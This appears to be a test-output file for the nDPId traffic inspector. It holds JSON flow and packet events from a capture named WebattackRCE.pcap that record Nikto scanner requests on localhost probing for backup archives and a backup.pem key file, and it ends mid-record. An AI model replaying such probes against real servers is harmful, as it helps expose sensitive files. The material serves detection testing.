+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276928,"flow_last_seen":1576420276928,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1576420276928,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276928,"pkt":"AAAAAAAAAAAAAAAACABFAADIwcZAAEAGemd\/AAABfwAAAcLUH5BvVfmVJOeoY4AYAED+vAAAAQEICp1m++idZvvoR0VUIC8xMjcuMC4wLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276928,"flow_last_seen":1576420276928,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49876,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276929,"flow_last_seen":1576420276929,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1576420276929,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276929,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/L19AAEAGDNh\/AAABfwAAAcLWH5BVghcOcLaACoAYAED+swAAAQEICp1m++mdZvvpR0VUIC8xMjcudGd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276929,"flow_last_seen":1576420276929,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49878,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276932,"flow_last_seen":1576420276932,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276932,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1576420276932,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276932,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/j\/RAAEAGrEJ\/AAABfwAAAcLYH5CKH7ek\/31EG4AYAED+swAAAQEICp1m++ydZvvsR0VUIC8xMjcudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276932,"flow_last_seen":1576420276932,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276932,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49880,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276933,"flow_last_seen":1576420276933,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1576420276933,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276933,"pkt":"AAAAAAAAAAAAAAAACABFAADFT2BAAEAG7NB\/AAABfwAAAcLaH5CU9HcQhzdjIYAYAED+uQAAAQEICp1m++2dZvvtR0VUIC9zaXRlLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276933,"flow_last_seen":1576420276933,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49882,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276934,"flow_last_seen":1576420276934,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276934,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1576420276934,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276934,"pkt":"AAAAAAAAAAAAAAAACABFAADFqdVAAEAGklt\/AAABfwAAAcLcH5A055GDxax\/gIAYAED+uQAAAQEICp1m++6dZvvuR0VUIC9zaXRlLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276934,"flow_last_seen":1576420276934,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276934,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49884,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276936,"flow_last_seen":1576420276936,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276936,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1576420276936,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420276936,"pkt":"AAAAAAAAAAAAAAAACABFAADKdTNAAEAGxvh\/AAABfwAAAcLeH5C4Uk1kAkvbMoAYAED+vgAAAQEICp1m+++dZvvvR0VUIC8xMjcuMC4wLjEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276936,"flow_last_seen":1576420276936,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276936,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49886,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276937,"flow_last_seen":1576420276937,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276937,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1576420276937,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420276937,"pkt":"AAAAAAAAAAAAAAAACABFAADK9XZAAEAGRrV\/AAABfwAAAcLgH5B7eM0nuPdDlYAYAED+vgAAAQEICp1m+\/GdZvvxR0VUIC8xMjcuMC4wLjEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
+01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276937,"flow_last_seen":1576420276937,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276937,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49888,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276938,"flow_last_seen":1576420276938,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276938,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1576420276938,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276938,"pkt":"AAAAAAAAAAAAAAAACABFAADFaYFAAEAG0q9\/AAABfwAAAcLiH5DjU1EuPo0KHoAYAED+uQAAAQEICp1m+\/KdZvvyR0VUIC8xMjcuMC4wLjEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276938,"flow_last_seen":1576420276938,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276938,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49890,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276939,"flow_last_seen":1576420276939,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276939,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1576420276939,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276939,"pkt":"AAAAAAAAAAAAAAAACABFAADFJ3BAAEAGFMF\/AAABfwAAAcLkH5B8NB8+Bh651YAYAED+uQAAAQEICp1m+\/OdZvvzR0VUIC8xMjcuMC4wLjEuemlwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276939,"flow_last_seen":1576420276939,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276939,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49892,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276941,"flow_last_seen":1576420276941,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276941,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1576420276941,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276941,"pkt":"AAAAAAAAAAAAAAAACABFAADCOKZAAEAGA45\/AAABfwAAAcLmH5ActAD4h3K22IAYAED+tgAAAQEICp1m+\/WdZvv1R0VUIC9iYWNrdXAucGVtIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276941,"flow_last_seen":1576420276941,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276941,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49894,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276943,"flow_last_seen":1576420276943,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276943,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1576420276943,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276943,"pkt":"AAAAAAAAAAAAAAAACABFAADCuRhAAEAGgxt\/AAABfwAAAcLoH5DBbYFGICWC9IAYAED+tgAAAQEICp1m+\/edZvv3R0VUIC9iYWNrdXAucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276943,"flow_last_seen":1576420276943,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276943,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49896,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 